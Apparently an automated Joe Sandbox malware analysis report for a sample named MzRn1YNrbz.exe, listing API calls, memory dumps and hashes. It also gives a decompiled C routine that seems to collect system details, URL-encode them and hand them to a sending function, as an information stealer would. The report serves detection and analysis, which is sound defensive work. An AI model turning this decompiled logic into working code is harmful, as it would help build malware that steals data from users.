GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
_free.LIBCMT ref: 00F18B29
_free.LIBCMT ref: 00F18B5F
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 34b5e81a2f7aa8d5b4d571f70d4e1f0e6799c3b2337bcc736e4872fe162165f7
Instruction ID: 79c60130a0197bd4271c9c3a3609f8d65a89a8b58e44172f88703bf995e2d4e5
Opcode Fuzzy Hash: 34b5e81a2f7aa8d5b4d571f70d4e1f0e6799c3b2337bcc736e4872fe162165f7
Instruction Fuzzy Hash: A3112576A083056BD628B6B55D85EEB356ADFC07F8B240278F5288A1C1DE289CC67320

Uniqueness

Uniqueness Score: -1.00%

Function 00F18C1E Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00F13AD0,00F1D6F0,?,00F22956,?,00000004,00000000,?,?,?,00F16BBE,?,00000000), ref: 00F18C23
_free.LIBCMT ref: 00F18C80
_free.LIBCMT ref: 00F18CB6
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F22956,?,00000004,00000000,?,?,?,00F16BBE,?,00000000,00000004), ref: 00F18CC1

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e7ae63465482cc35c7568edbbed93beca4c73af96874f0fa3f766e758aafff79
Instruction ID: b806a309f9c810eb48321f647a1a73932fabeb517dfa2e247592825151f1245f
Opcode Fuzzy Hash: e7ae63465482cc35c7568edbbed93beca4c73af96874f0fa3f766e758aafff79
Instruction Fuzzy Hash: FD114832A093046AD62436756D85EEB35AADBC13F8B640278F5388B1C1DE349CCB73B0

Uniqueness

Uniqueness Score: -1.00%

Function 00F26442 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,00F24985,?,00000001,?,?,?,00F1AA2B), ref: 00F26459
GetLastError.KERNEL32(?,00F24985,?,00000001,?,?,?,00F1AA2B), ref: 00F26465

Part of subcall function 00F2642B: CloseHandle.KERNEL32(FFFFFFFE,00F26475,?,00F24985,?,00000001,?,?,?,00F1AA2B), ref: 00F2643B

___initconout.LIBCMT ref: 00F26475

Part of subcall function 00F263ED: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F2641C,00F24972,?,?,00F1AA2B), ref: 00F26400

WriteConsoleW.KERNEL32(?,?,?,00000000,?,00F24985,?,00000001,?,?,?,00F1AA2B), ref: 00F2648A

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0d0a73f64359a2b5cae843dd671314a8fbe1ecd2c5808393945222f521aa44f8
Instruction ID: e939f780c3f84a767daa4a9d58961479c5ad80d51aeeca151d8c7b87b1cd2705
Opcode Fuzzy Hash: 0d0a73f64359a2b5cae843dd671314a8fbe1ecd2c5808393945222f521aa44f8
Instruction Fuzzy Hash: 48F0123650012CBBCF366FA1EC05D9E3F69FF453A5B508021FD1AC5110C63288A1EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00F16E54 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F16E5D

Part of subcall function 00F1799F: HeapFree.KERNEL32(00000000,00000000,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?), ref: 00F179B5
Part of subcall function 00F1799F: GetLastError.KERNEL32(?,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?,?), ref: 00F179C7

_free.LIBCMT ref: 00F16E70
_free.LIBCMT ref: 00F16E81
_free.LIBCMT ref: 00F16E92

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1a2406a0aa3ade9dae242815445acf79dcc3661da6c656c596d5d864a6cd6510
Instruction ID: 3bfab99b7a43274f3a451af45d64b5149dd9bce8ce4990c366b57c3ffe226d3e
Opcode Fuzzy Hash: 1a2406a0aa3ade9dae242815445acf79dcc3661da6c656c596d5d864a6cd6510
Instruction Fuzzy Hash: 2CE0B6758083209AA63B7F24B8124A9BFB3EF48B113C5146AF42C5721DC63A05D7EBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00F149DB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\MzRn1YNrbz.exe, xrefs: 00F14A1E, 00F14A25, 00F14A5B

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\MzRn1YNrbz.exe
API String ID: 0-633649950
Opcode ID: 6a69aeee7bce03fd0ae3cbce0a1515b2a6fe3bf714fb59a58b389e752206a7b4
Instruction ID: b88edb2c4d8869d03045d186bb0fc6baecf4476a3bc304b17c34996718ec361e
Opcode Fuzzy Hash: 6a69aeee7bce03fd0ae3cbce0a1515b2a6fe3bf714fb59a58b389e752206a7b4
Instruction Fuzzy Hash: 7A419371E04218AFDB26DF99DC81EEEBBF8EFC4710B140066E405D7241D779AA81EB94

Uniqueness

Uniqueness Score: -1.00%

Function 00F0E4F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00F0E52F
__IsNonwritableInCurrentImage.LIBCMT ref: 00F0E5E3

Strings

csm, xrefs: 00F0E5CD

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 3f251b2b96116cf1561a6db995fb61ce732de589257bcede34bd13d5cd483441
Instruction ID: 13d0eba4a2a0a5b65346d3d4528b32f480ec3e3311194ca69e5a2c451daecb6f
Opcode Fuzzy Hash: 3f251b2b96116cf1561a6db995fb61ce732de589257bcede34bd13d5cd483441
Instruction Fuzzy Hash: F641B434E00219DFCF10DF68CC84AAEBBB5AF44328F148865E914AB3D2E735D945EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F0EE02 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F0EE27

Strings

RCC, xrefs: 00F0EE41
MOC, xrefs: 00F0EE39

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ea299bfd2abdb6322a1ff4ca408a2022e0f777190590a7f320dcc2dafbc069da
Instruction ID: ad22ed2bd2a38bef3de9d02a007874afaf632a7281c1ebf19ad392bdd89b7358
Opcode Fuzzy Hash: ea299bfd2abdb6322a1ff4ca408a2022e0f777190590a7f320dcc2dafbc069da
Instruction Fuzzy Hash: F1414671D0020DAFDF15DF98CD81AAEBBB5AF48310F1584A9F91467291D335A950EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F01950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F018E0: std::ios_base::good.LIBCPMTD ref: 00F018F3
Part of subcall function 00F018E0: task.LIBCPMTD ref: 00F01924
Part of subcall function 00F018E0: task.LIBCPMTD ref: 00F01938

std::runtime_error::runtime_error.LIBCPMTD ref: 00F01989

Part of subcall function 00F01670: std::exception::exception.LIBCONCRTD ref: 00F01683

task.LIBCPMTD ref: 00F01991

Strings

ios_base::eofbit set, xrefs: 00F0196B

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: task$std::exception::exceptionstd::ios_base::goodstd::runtime_error::runtime_error
String ID: ios_base::eofbit set
API String ID: 2891284423-2405381885
Opcode ID: fc8f5041e8ea725c5872e2c0d8aa6c96f2b26106d497edc84d1db2eae4bd742c
Instruction ID: c43c711f5d789d4a220157beff102e1e3b187fae5fd06e19efeed5e3a592601a
Opcode Fuzzy Hash: fc8f5041e8ea725c5872e2c0d8aa6c96f2b26106d497edc84d1db2eae4bd742c
Instruction Fuzzy Hash: 6701DE75E0020C9BCB08EFA8DC919DEB7F9BF4C300B408559E815A7381DB38A940DB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 7108, Parent PID: 4416COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.9%
Total number of Nodes:	1055
Total number of Limit Nodes:	9

Executed Functions

Function 00403250 Relevance: 58.5, APIs: 31, Strings: 2, Instructions: 787
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00403250(void* __edi, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				char _v1044;
				char _v1068;
				char _v1092;
				char _v1116;
				char _v1140;
				char _v1164;
				char _v1188;
				char _v1212;
				char _v1236;
				char _v1260;
				char _v1284;
				char _v1308;
				char _v1332;
				char _v1356;
				char _v1380;
				char _v1404;
				char _v1428;
				char _v1452;
				char _v1476;
				char _v1500;
				char _v1524;
				char _v1548;
				char _v1572;
				char _v1596;
				char _v1620;
				char _v1644;
				char _v1668;
				char _v1692;
				char _v1716;
				char _v1740;
				char _v1756;
				char _v1772;
				char _v1788;
				char _v1804;
				char _v1820;
				char _v1836;
				char _v1852;
				char _v1868;
				char _v1884;
				char _v1900;
				char _v1916;
				char _v1932;
				char _v1948;
				char _v1964;
				char _v1980;
				char _v2028;
				char _v2060;
				char _v2092;
				char _v2124;
				char _v2156;
				char _v2188;
				char _v2220;
				char _v2284;
				intOrPtr _v2336;
				intOrPtr _v2340;
				char _v2348;
				signed char _v2349;
				signed int _v2350;
				signed int _v2351;
				signed char _v2352;
				signed char _v2353;
				signed int _v2354;
				signed char _v2355;
				signed char _v2356;
				signed int _v2357;
				signed char _v2358;
				signed char _v2359;
				signed int _v2360;
				signed char _v2361;
				signed char _v2362;
				signed int _v2363;
				signed char _v2364;
				signed char _v2365;
				signed char _v2366;
				signed char _v2367;
				signed int _v2368;
				signed char _v2369;
				signed int _v2370;
				signed char _v2371;
				signed int _v2372;
				signed char _v2373;
				signed char _v2374;
				signed int _v2375;
				signed char _v2376;
				signed int _v2377;
				signed char _v2378;
				signed char _v2379;
				signed char _v2380;
				signed int _v2381;
				signed char _v2382;
				signed char _v2383;
				signed int _v2384;
				signed char _v2385;
				signed char _v2386;
				signed int _v2387;
				signed char _v2388;
				signed int _v2389;
				signed char _v2390;
				signed int _v2391;
				signed char _v2392;
				signed char _v2393;
				signed char _v2394;
				signed int _v2395;
				signed char _v2396;
				signed char _v2397;
				signed int _v2398;
				signed char _v2399;
				signed char _v2400;
				signed int _v2401;
				signed int _v2402;
				signed char _v2403;
				signed char _v2404;
				signed char _v2405;
				signed char _v2406;
				signed int _v2407;
				signed int _v2408;
				signed char _v2409;
				signed char _v2410;
				signed char _v2411;
				signed char _v2412;
				signed int _v2413;
				signed char _v2414;
				signed char _v2415;
				signed int _v2416;
				signed char _v2417;
				char _v2418;
				char _v2419;
				char _v2420;
				char _v2421;
				intOrPtr _v2428;
				intOrPtr _v2432;
				char _v2436;
				intOrPtr _v2440;
				intOrPtr _v2444;
				intOrPtr _v2448;
				intOrPtr _v2452;
				intOrPtr _v2456;
				char _v2460;
				char _v2464;
				intOrPtr _v2468;
				intOrPtr _v2472;
				intOrPtr _v2476;
				intOrPtr _v2480;
				intOrPtr _v2484;
				intOrPtr _v2488;
				intOrPtr _v2492;
				intOrPtr _v2496;
				intOrPtr _v2500;
				intOrPtr _v2504;
				intOrPtr _v2508;
				char _v2524;
				void* __ebx;
				void* __esi;
				signed int _t310;
				void* _t343;
				void* _t348;
				void* _t355;
				signed char _t367;
				void* _t432;
				signed char _t446;
				void* _t483;
				void* _t497;
				void* _t517;
				void* _t776;
				void* _t780;
				void* _t785;
				signed int _t788;
				void* _t795;
				void* _t796;
				void* _t797;
				void* _t798;
				void* _t799;
				void* _t801;
				void* _t808;
				void* _t809;
				void* _t817;
				void* _t828;

				_t817 = __eflags;
				_t775 = __edi;
				_t522 = _t785;
				_t788 = (_t785 - 0x00000008 & 0xffffffe0) + 4;
				_v8 =  *((intOrPtr*)(_t785 + 4));
				_t783 = _t788;
				_t310 =  *0x4c61a4; // 0x8656a166
				_v16 = _t310 ^ _t788;
				_push(_t776);
				_v2370 = 0;
				_v2371 = 0;
				_v2372 = 0;
				E00415310( &_v1068, _t817, E0041B730(E00404D70( &_v2284, _v2372 & 0x000000ff, _v2372 & 0x000000ff, _v2371 & 0x000000ff, _v2370 & 0x000000ff), _v2372 & 0x000000ff, __edi, _t776));
				_v2373 = 0;
				_v2374 = 0;
				_v2375 = 0;
				E00418060( &_v1068, E0041B540(E00404E30( &_v2028, _v2375 & 0x000000ff, _v2375 & 0x000000ff, _v2374 & 0x000000ff, _v2373 & 0x000000ff), _v2375 & 0x000000ff, __edi, _t776));
				_v2376 = 0;
				_v2377 = 0;
				_v2378 = 0;
				_v2508 = E004023D0(_t785, __edi, _t776, _t817,  &_v1404);
				_v2448 = E0041B420(E00405320( &_v1820, _v2377 & 0x000000ff, _v2378 & 0x000000ff, _v2377 & 0x000000ff, _v2376 & 0x000000ff), _v2377 & 0x000000ff);
				E00418020( &_v1068, E00406240(_t817,  &_v1644, E00406320(_t817,  &_v1668, _v2448, _v2508), "\n"));
				E00416980( &_v1644);
				E00416980( &_v1668);
				E00416980( &_v1404);
				_v2379 = 0;
				_v2380 = 0;
				_v2381 = 0;
				_v2428 = E004024E0( &_v1284, __edi,  &_v1284);
				_v2432 = E0041B420(E004047F0( &_v1804, _v2381 & 0x000000ff, _v2381 & 0x000000ff, _v2380 & 0x000000ff, _v2379 & 0x000000ff), _v2381 & 0x000000ff);
				_t343 = E00406240(_t817,  &_v1716, E00406320(_t817,  &_v1740, _v2432, _v2428), "\n");
				_t795 = _t788 - 0x9dc + 0x38;
				E00418020( &_v1068, _t343);
				E00416980( &_v1716);
				E00416980( &_v1740);
				E00416980( &_v1284);
				_v2348 = 0x40;
				_v2436 =  &_v2348;
				_t348 = E00406CE0( &_v2419, _t817,  &_v2436); // executed
				if(_t348 != 0) {
					_v2382 = 0;
					_v2383 = 0;
					_v2384 = 0;
					_v2385 = 0;
					_v2386 = 0;
					_v2387 = 0;
					_t770 = _v2384 & 0x000000ff;
					_v2452 = E0041B420(E004052D0( &_v1788, _v2384 & 0x000000ff, _v2384 & 0x000000ff, _v2383 & 0x000000ff, _v2382 & 0x000000ff), _v2384 & 0x000000ff);
					_v2440 = E00424470( &_v1356, E00424A30(E00424A30(_v2340, _v2336, 0x400, 0), _v2384 & 0x000000ff, 0x400, 0), _t770);
					_v2444 = E0041B420(E00405A60( &_v1772, _v2387 & 0x000000ff, _v2387 & 0x000000ff, _v2386 & 0x000000ff, _v2385 & 0x000000ff), _v2387 & 0x000000ff);
					_v2456 = E00406320(0,  &_v1332, _v2444, _v2440);
					_t517 = E00406240(0,  &_v1308, _v2456, _v2452);
					_t795 = _t795 + 0x24;
					E00418020( &_v1068, _t517);
					E00416980( &_v1308);
					E00416980( &_v1332);
					E00416980( &_v1356);
				}
				_v2369 = 0;
				_v2388 = 0;
				_v2389 = 0;
				E00418060( &_v1068, E0041B540(E004054B0( &_v2060, _v2389 & 0x000000ff, _v2389 & 0x000000ff, _v2388 & 0x000000ff, _v2369 & 0x000000ff), _v2389 & 0x000000ff, _t775, _t776));
				_v2460 = 0x400;
				_v2464 =  &_v2460;
				_t355 = E00406900( &_v2418, 0,  &_v1044,  &_v2464); // executed
				if(_t355 != 0) {
					_v2390 = 0;
					_v2391 = 0;
					_v2392 = 0;
					_v2468 = E00415310( &_v1692, 0,  &_v1044);
					_v2472 = E0041B540(E00404CF0( &_v2092, _v2391 & 0x000000ff, _v2392 & 0x000000ff, _v2391 & 0x000000ff, _v2390 & 0x000000ff), _v2391 & 0x000000ff, _t775, _t776);
					_t497 = E00406240(0,  &_v1380, E00406320(0,  &_v1428, _v2472, _v2468), "\n");
					_t795 = _t795 + 0x18;
					E00418020( &_v1068, _t497);
					E00416980( &_v1380);
					E00416980( &_v1428);
					E00416980( &_v1692);
				}
				E004157E0( &_v1140);
				_v2393 = 0;
				_v2394 = 0;
				_v2395 = 0;
				_v2396 = 0;
				_v2397 = 0;
				_v2398 = 0;
				_push( &_v1140);
				_t796 = _t795 - 0x18;
				E00415310(_t796, 0, E0041B420(E004050F0( &_v1756, _v2395 & 0x000000ff, _v2395 & 0x000000ff, _v2394 & 0x000000ff, _v2393 & 0x000000ff), _v2395 & 0x000000ff));
				_t797 = _t796 - 0x18;
				_t778 = _t797;
				E00415310(_t797, 0, E0041B420(E00405190( &_v1980, _v2398 & 0x000000ff, _v2398 & 0x000000ff, _v2397 & 0x000000ff, _v2396 & 0x000000ff), _v2398 & 0x000000ff)); // executed
				_t367 = E004025E0(_t775, _t797, 0); // executed
				_t798 = _t797 + 0x34;
				_t822 = _t367 & 0x000000ff;
				if((_t367 & 0x000000ff) != 0) {
					_t808 = _t798 - 0x18;
					E00415230(_t808,  &_v1140);
					_t446 = E004021E0(_t822);
					_t798 = _t808 + 0x18;
					_t823 = _t446 & 0x000000ff;
					if((_t446 & 0x000000ff) != 0) {
						_push(0);
						_push(1);
						_t809 = _t798 - 0x28;
						E004158F0(_t809, 0);
						_push( &_v1140);
						_push( &_v2524);
						E00412010(_t775, _t778, _t823, _t828);
						_v2399 = 0;
						_v2400 = 0;
						_v2401 = 0;
						_v2402 = 0;
						_v2403 = 0;
						_v2404 = 0;
						_v2476 = E00414F10( &_v2421);
						_v2480 = E00406100(_t522,  &_v2524, _t775, _t778, E0041B420(E00405920( &_v1836, _v2401 & 0x000000ff, _v2401 & 0x000000ff, _v2400 & 0x000000ff, _v2399 & 0x000000ff), _v2401 & 0x000000ff));
						_v2484 = E00405DD0( &_v1500, _t823, _v2480, _v2476);
						_v2488 = E0041B420(E004058D0( &_v1852, _v2402 & 0x000000ff, _v2404 & 0x000000ff, _v2403 & 0x000000ff, _v2402 & 0x000000ff), _v2402 & 0x000000ff);
						E00418020( &_v1068, E00406240(_t823,  &_v1452, E00406320(_t823,  &_v1476, _v2488, _v2484), "\n"));
						E00416980( &_v1452);
						E00416980( &_v1476);
						E00416980( &_v1500);
						_v2405 = 0;
						_v2406 = 0;
						_v2407 = 0;
						_v2408 = 0;
						_v2409 = 0;
						_v2410 = 0;
						_v2492 = E00414F10( &_v2420);
						_v2496 = E00406100(_t522,  &_v2524, _t775, _t778, E0041B420(E004059C0( &_v1868, _v2407 & 0x000000ff, _v2407 & 0x000000ff, _v2406 & 0x000000ff, _v2405 & 0x000000ff), _v2407 & 0x000000ff));
						_v2500 = E00405DD0( &_v1572, 0, _v2496, _v2492);
						_v2504 = E0041B540(E00405070( &_v2220, _v2408 & 0x000000ff, _v2410 & 0x000000ff, _v2409 & 0x000000ff, _v2408 & 0x000000ff), _v2408 & 0x000000ff, _t775, _t778);
						_t483 = E00406240(0,  &_v1524, E00406320(0,  &_v1548, _v2504, _v2500), "\n");
						_t798 = _t809 + 0x68;
						E00418020( &_v1068, _t483);
						E00416980( &_v1524);
						E00416980( &_v1548);
						E00416980( &_v1572);
						E00416950( &_v2524);
					}
				}
				_v2411 = 0;
				_v2412 = 0;
				_v2413 = 0;
				if(E0041B420(E00405530( &_v1884, _v2413 & 0x000000ff, _v2413 & 0x000000ff, _v2412 & 0x000000ff, _v2411 & 0x000000ff), _v2413 & 0x000000ff) != 0x440226) {
					_v2414 = 0;
					_v2415 = 0;
					_v2416 = 0;
					E00418060( &_v1068, E0041B540(E00405580( &_v2124, _v2416 & 0x000000ff, _v2416 & 0x000000ff, _v2415 & 0x000000ff, _v2414 & 0x000000ff), _v2416 & 0x000000ff, _t775, _t778));
					_v2417 = 0;
					_v2349 = 0;
					_v2350 = 0;
					E00418060( &_v1068, E0041B420(E00405530( &_v1900, _v2350 & 0x000000ff, _v2350 & 0x000000ff, _v2349 & 0x000000ff, _v2417 & 0x000000ff), _v2350 & 0x000000ff));
					E00418060( &_v1068, "\n");
				}
				E004157E0( &_v1116);
				E00415310( &_v1188, 0, "%20");
				E00415310( &_v1164, 0, " ");
				_push( &_v1188);
				_push( &_v1164);
				_t799 = _t798 - 0x18;
				E00415230(_t799,  &_v1068);
				_push( &_v1596);
				E00416F00( &_v1116, E00402C00(_t799));
				E00416980( &_v1596);
				E00416980( &_v1164);
				E00416980( &_v1188);
				E00415310( &_v1236, 0, "%0A");
				E00415310( &_v1212, 0, "\n");
				_push( &_v1236);
				_push( &_v1212);
				_t801 = _t799 + 0x24 - 0x18;
				E00415230(_t801,  &_v1116);
				_push( &_v1620);
				E00416F00( &_v1116, E00402C00( &_v1620));
				E00416980( &_v1620);
				E00416980( &_v1212);
				E00416980( &_v1236);
				_v2351 = 0;
				_v2352 = 0;
				_v2353 = 0;
				E00415310( &_v1092, 0, E0041B420(E00405B30( &_v1916, _v2351 & 0x000000ff, _v2353 & 0x000000ff, _v2352 & 0x000000ff, _v2351 & 0x000000ff), _v2351 & 0x000000ff));
				_v2354 = 0;
				_v2355 = 0;
				_v2356 = 0;
				E00418060( &_v1092, E0041B420(E00405880( &_v1932, _v2354 & 0x000000ff, _v2356 & 0x000000ff, _v2355 & 0x000000ff, _v2354 & 0x000000ff), _v2354 & 0x000000ff));
				_v2357 = 0;
				_v2358 = 0;
				_v2359 = 0;
				E00418060( &_v1092, E0041B540(E00405B80( &_v2156, _v2357 & 0x000000ff, _v2359 & 0x000000ff, _v2358 & 0x000000ff, _v2357 & 0x000000ff), _v2357 & 0x000000ff, _t775, _t778));
				_v2360 = 0;
				_v2361 = 0;
				_v2362 = 0;
				E00418060( &_v1092, E0041B420(E004053C0( &_v1948, _v2360 & 0x000000ff, _v2362 & 0x000000ff, _v2361 & 0x000000ff, _v2360 & 0x000000ff), _v2360 & 0x000000ff));
				_v2363 = 0;
				_v2364 = 0;
				_v2365 = 0;
				E00418060( &_v1092, E0041B420(E004046D0( &_v1964, _v2363 & 0x000000ff, _v2365 & 0x000000ff, _v2364 & 0x000000ff, _v2363 & 0x000000ff), _v2363 & 0x000000ff));
				E00418020( &_v1092,  &_v1116);
				E004157E0( &_v1260);
				_v2366 = 0;
				_v2367 = 0;
				_v2368 = 0;
				_push( &_v1260);
				_t803 = _t801 + 0x24 - 0x18;
				E00415230(_t801 + 0x24 - 0x18,  &_v1092);
				E00415310(_t803 - 0x18, 0, E0041B540(E00404C70( &_v2188, _v2368 & 0x000000ff, _v2368 & 0x000000ff, _v2367 & 0x000000ff, _v2366 & 0x000000ff), _v2368 & 0x000000ff, _t775, _t803 - 0x18)); // executed
				E004025E0(_t775, _t803 - 0x18, 0); // executed
				E00416980( &_v1260);
				E00416980( &_v1092);
				E00416980( &_v1116);
				E00416980( &_v1140);
				_t432 = E00416980( &_v1068);
				_pop(_t780);
				return E00424900(_t432, _t522, _v16 ^ _t783, _v2368 & 0x000000ff, _t775, _t780);
			}

0x00403250
0x00403250
0x00403251
0x00403259
0x00403260
0x00403264
0x0040326c
0x00403273
0x00403276
0x00403279
0x00403281
0x00403289
0x004032c0
0x004032c7
0x004032cf
0x004032d7
0x0040330e
0x00403315
0x0040331d
0x00403325
0x0040333a
0x0040336a
0x004033a9
0x004033b4
0x004033bf
0x004033ca
0x004033d1
0x004033d9
0x004033e1
0x004033f6
0x00403426
0x00403456
0x0040345b
0x00403465
0x00403470
0x0040347b
0x00403486
0x0040348b
0x0040349b
0x004034ae
0x004034b5
0x004034bd
0x004034c5
0x004034cd
0x004034d5
0x004034dd
0x004034e5
0x004034fb
0x00403515
0x00403554
0x00403584
0x004035a7
0x004035c2
0x004035c7
0x004035d1
0x004035dc
0x004035e7
0x004035f2
0x004035f2
0x004035f9
0x00403601
0x00403609
0x00403640
0x00403645
0x00403655
0x0040366f
0x00403676
0x0040367e
0x00403686
0x0040368e
0x004036a6
0x004036d6
0x00403706
0x0040370b
0x00403715
0x00403720
0x0040372b
0x00403736
0x00403736
0x00403741
0x00403748
0x00403750
0x00403758
0x00403760
0x00403768
0x00403770
0x0040377c
0x0040377d
0x004037af
0x004037b4
0x004037b7
0x004037e6
0x004037eb
0x004037f0
0x004037f6
0x004037f8
0x004037fe
0x0040380a
0x0040380f
0x00403814
0x0040381a
0x0040381c
0x00403822
0x00403824
0x00403826
0x0040382d
0x00403838
0x0040383f
0x00403840
